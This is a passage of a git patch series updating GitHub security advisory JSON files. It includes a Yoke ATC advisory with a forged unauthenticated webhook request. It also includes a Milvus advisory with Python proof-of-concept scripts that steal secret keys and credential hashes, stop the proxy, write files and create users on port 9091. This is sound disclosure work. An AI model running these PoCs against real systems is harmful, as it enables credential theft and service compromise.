verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. **Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -35,6 +40,10 @@ "type": "WEB", "url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055" + }, { "type": "PACKAGE", "url": "https://github.com/yokecd/yoke" @@ -51,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:06:36Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:06Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json index 8352be849afb8..e8b973a8fc6c9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json +++ b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jr94-gj3h-c8rf", - "modified": "2026-02-12T22:13:04Z", + "modified": "2026-02-13T17:15:48Z", "published": "2026-02-12T22:13:04Z", "aliases": [ "CVE-2026-26185" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185" + }, { "type": "WEB", "url": "https://github.com/directus/directus/pull/26485" @@ -83,6 +87,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:13:04Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:07Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json index ef61279e7c947..3aa9ca8632954 100644 --- a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json +++ b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p6pv-q7rc-g4h9", - "modified": "2026-02-07T00:33:27Z", + "modified": "2026-02-13T17:16:21Z", "published": "2026-02-05T21:13:24Z", "aliases": [ "CVE-2026-25757" @@ -117,6 +117,10 @@ "type": "WEB", "url": "https://github.com/spree/spree/commit/ea4a5db590ca753dbc986f2a4e818d9e0edfb1ad" }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_storefront/CVE-2026-25757.yml" + }, { "type": "PACKAGE", "url": "https://github.com/spree/spree" diff --git a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json index 6827582b45fe6..5704bba6e30b7 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json +++ b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wj8p-jj64-h7ff", - "modified": "2026-02-12T22:07:10Z", + "modified": "2026-02-13T17:15:43Z", "published": "2026-02-12T22:06:45Z", "aliases": [ "CVE-2026-26056" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/yokecd/yoke/security/advisories/GHSA-wj8p-jj64-h7ff" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26056" + }, { "type": "PACKAGE", "url": "https://github.com/yokecd/yoke" @@ -52,6 +56,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:06:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:06Z" } } \ No newline at end of file From 72d21846d34d5522e8d13a87d27529d037e973c2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 17:19:08 +0000 Subject: [PATCH 064/215] Publish GHSA-7ppg-37fh-vcr6 --- .../2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json index a071acda2440b..bb867f815572c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json +++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-7ppg-37fh-vcr6", - "modified": "2026-02-11T19:49:44Z", + "modified": "2026-02-13T17:17:11Z", "published": "2026-02-11T19:49:44Z", - "aliases": [], + "aliases": [ + "CVE-2026-26190" + ], "summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise", "details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).", "severity": [ From fd8723f904a302133f0e49a1d880516b9a13904f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 18:22:27 +0000 Subject: [PATCH 065/215] Publish GHSA-pm44-x5x7-24c4 --- .../2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json index 8c5e98ce1e6a9..ea3ae3579b5d2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json +++ b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pm44-x5x7-24c4", - "modified": "2026-02-11T21:40:07Z", + "modified": "2026-02-13T18:20:21Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2026-22922" @@ -28,7 +28,7 @@ "introduced": "3.1.0" }, { - "fixed": "3.17.0" + "fixed": "3.1.7" } ] } From 90f44678b6bbbed510aa44dc4c3d036d7d0cb276 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 18:32:38 +0000 Subject: [PATCH 066/215] Advisory Database Sync --- .../GHSA-23wj-fq4f-57vr.json | 6 ++- .../GHSA-54jh-gr2j-w5jp.json | 13 ++++- .../GHSA-9cr4-jvh8-pr25.json | 6 ++- .../GHSA-c6wh-345m-mrfm.json | 6 ++- .../GHSA-g4fr-g4v5-cfmc.json | 6 ++- .../GHSA-jgcm-pqcv-h934.json | 6 ++- .../GHSA-f6p2-2572-4pjp.json | 6 ++- .../GHSA-m77w-6vjw-wh2f.json | 6 ++- .../GHSA-2g3f-rmh8-cj3f.json | 6 ++- .../GHSA-x34v-6wh4-m93r.json | 6 ++- .../GHSA-5mqf-9q34-g8c2.json | 6 ++- .../GHSA-9w8w-fgjg-w972.json | 6 ++- .../GHSA-6v67-599p-fprc.json | 6 ++- .../GHSA-9x7h-v87g-j6jw.json | 11 +++-- .../GHSA-rr66-qxh8-8qwq.json | 11 +++-- .../GHSA-45gw-fx24-h4pv.json | 15 ++++-- .../GHSA-75wh-ww84-2q6c.json | 11 +++-- .../GHSA-4vjp-phjj-3f57.json | 6 ++- .../GHSA-x2jm-xff2-34w4.json | 4 +- .../GHSA-2886-9536-rhhj.json | 6 ++- .../GHSA-rfj8-8392-mfcm.json | 6 ++- .../GHSA-v6c5-9mp4-mwq4.json | 6 ++- .../GHSA-5wfc-7v23-c2vf.json | 6 ++- .../GHSA-5mc7-p6pj-r3f5.json | 6 ++- .../GHSA-jh94-8q48-f3m3.json | 6 ++- .../GHSA-qg84-jfh7-8hpx.json | 3 +- .../GHSA-224f-wm46-5p4r.json | 33 +++++++++++++ .../GHSA-26vr-h5vf-58cq.json | 4 +- .../GHSA-3669-8ww5-g35f.json | 44 +++++++++++++++++ .../GHSA-3q2x-q945-c5mm.json | 6 ++- .../GHSA-4gg4-26q8-wv28.json | 37 ++++++++++++++ .../GHSA-5wr5-vxhh-x7gm.json | 44 +++++++++++++++++ .../GHSA-7v9f-f4qv-fcxh.json | 36 ++++++++++++++ .../GHSA-8xrx-9wj4-6775.json | 4 +- .../GHSA-c5gm-v7v7-vjx9.json | 4 +- .../GHSA-cgmm-x5ww-q5cr.json | 48 +++++++++++++++++++ .../GHSA-cm39-88fp-pv6j.json | 15 ++++-- .../GHSA-fq6p-4h82-858f.json | 29 +++++++++++ .../GHSA-fqf2-x743-9564.json | 4 +- .../GHSA-h6jx-x5f4-qmj9.json | 15 ++++-- .../GHSA-h892-rh45-x8jp.json | 11 +++-- .../GHSA-j98c-62jj-x3h3.json | 29 +++++++++++ .../GHSA-jhq4-533p-8p4c.json | 15 ++++-- .../GHSA-m7rx-q9f3-3p96.json | 3 +- .../GHSA-p47v-wp9g-8362.json | 15 ++++-- .../GHSA-p5cr-gq3j-93c4.json | 15 ++++-- .../GHSA-p5wr-5p37-2wm6.json | 6 ++- .../GHSA-qqhc-37jx-7gh5.json | 40 ++++++++++++++++ .../GHSA-r3p8-h9vv-9cqc.json | 37 ++++++++++++++ .../GHSA-vwfj-gc28-j2fg.json | 40 ++++++++++++++++ .../GHSA-w7w9-2vjv-7r67.json | 40 ++++++++++++++++ .../GHSA-x3j4-874w-h7pv.json | 29 +++++++++++ .../GHSA-xrqq-m9vv-pq36.json | 15 ++++-- 53 files changed, 730 insertions(+), 70 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json diff --git a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json index 19f7f39ffbc3a..ed8de91296818 100644 --- a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json +++ b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-23wj-fq4f-57vr", - "modified": "2022-05-14T02:03:36Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-14T02:03:36Z", "aliases": [ "CVE-2018-15899" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/bg5sbk/MiniCMS/issues/21" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2018-15899.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json index 16b452f6c8fef..20d62a664e145 100644 --- a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json +++ b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-54jh-gr2j-w5jp", - "modified": "2022-05-24T19:05:59Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-24T19:05:59Z", "aliases": [ "CVE-2021-35438" ], "details": "phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -17,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/phpipam/phpipam/issues/3351" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2021-35438.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json index 6c04751d31c4c..7f08fef4180f2 100644 --- a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json +++ b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9cr4-jvh8-pr25", - "modified": "2022-05-17T02:54:58Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:54:58Z", "aliases": [ "CVE-2017-6537" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/837" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6537.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96935" diff --git a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json index 2a3a2d6ac3379..cb6e77cd91868 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json +++ b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c6wh-345m-mrfm", - "modified": "2022-05-17T02:56:29Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:56:29Z", "aliases": [ "CVE-2017-6396" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/820" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6396.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96553" diff --git a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json index 2a156c1666c14..c1793f772b5f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json +++ b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4fr-g4v5-cfmc", - "modified": "2022-05-13T01:12:12Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-13T01:12:12Z", "aliases": [ "CVE-2017-6478" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6478.md" + }, { "type": "WEB", "url": "https://github.com/paintballrefjosh/MaNGOSWebV4/releases/tag/4.0.8" diff --git a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json index f56a19299b36b..2abd99ac4d2f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json +++ b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jgcm-pqcv-h934", - "modified": "2022-05-17T02:54:55Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:54:55Z", "aliases": [ "CVE-2017-6541" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/834" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6541.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96935" diff --git a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json index f819db96889f0..2ff58806de1a0 100644 --- a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json +++ b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f6p2-2572-4pjp", - "modified": "2023-02-12T06:30:27Z", + "modified": "2026-02-13T18:31:21Z", "published": "2023-02-04T15:30:32Z", "aliases": [ "CVE-2023-0676" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/phpipam/phpipam/commit/94ec73ff1d33926b75b811ded6f0b4a46088a7ec" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2023-0676.md" + }, { "type": "WEB", "url": "https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b" diff --git a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json index ec1169bfc8af9..810870c8729ed 100644 --- a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json +++ b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json @@ -1,7 